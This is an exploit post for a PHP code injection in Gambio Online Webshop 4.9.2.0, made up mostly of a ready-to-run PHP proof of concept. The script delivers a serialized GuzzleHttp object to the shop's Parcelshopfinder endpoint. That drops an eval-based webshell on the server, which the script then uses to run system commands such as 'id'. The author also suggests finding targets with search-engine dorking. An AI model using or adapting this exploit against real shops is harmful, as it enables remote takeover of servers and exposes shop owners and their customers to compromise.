Gambio Online Webshop 4.9.2.0 Code Injection
Gambio Online Webshop version 4.9.2.0 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.gambio.com/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 85 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GambioExploit { private $targetUrl; private $webshellName; private $postParam; private $getParam; private $phpCmdFunction; public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) { $this->targetUrl = $targetUrl; $this->phpCmdFunction = $phpCmdFunction; $this->webshellName = $webshellName ?: $this->randomString() . '.php'; $this->postParam = $this->randomString(); $this->getParam = $this->randomString(); } // Random string generator private function randomString($length = 8) { return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length); } // Function to send HTTP POST request private function sendPostRequest($uri, $data) { $url = $this->targetUrl . 
$uri; $options = [ 'http' => [ 'header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data), ], ]; $context = stream_context_create($options); return file_get_contents($url, false, $context); } // Upload webshell to target public function uploadWebshell() { $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>"; $finalPayload = base64_encode(serialize([ "GuzzleHttp\\Cookie\\FileCookieJar" => [ "cookies" => [ "GuzzleHttp\\Cookie\\SetCookie" => [ "data" => [ "Value" => $phpPayload, "Domain" => "target.com", "Path" => "/", ] ] ], "filename" => $this->webshellName ] ])); $this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [ 'checkout_started' => 0, 'search' => $finalPayload, 'firstname' => 'test', 'lastname' => 'test', ]); echo "Webshell uploaded to: {$this->webshellName}\n"; } // Execute PHP payload public function executePhp($cmd) { $payload = base64_encode($cmd); $this->sendPostRequest("/{$this->webshellName}", [ $this->postParam => $payload ]); echo "Executed command via webshell: {$cmd}\n"; } // Execute command public function executeCommand($cmd) { $payload = base64_encode($cmd); $this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [ $this->postParam => $payload ]); echo "Executed command: {$cmd}\n"; }}// Example Usage$exploit = new GambioExploit('https://target.com');$exploit->uploadWebshell();$exploit->executeCommand('id');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================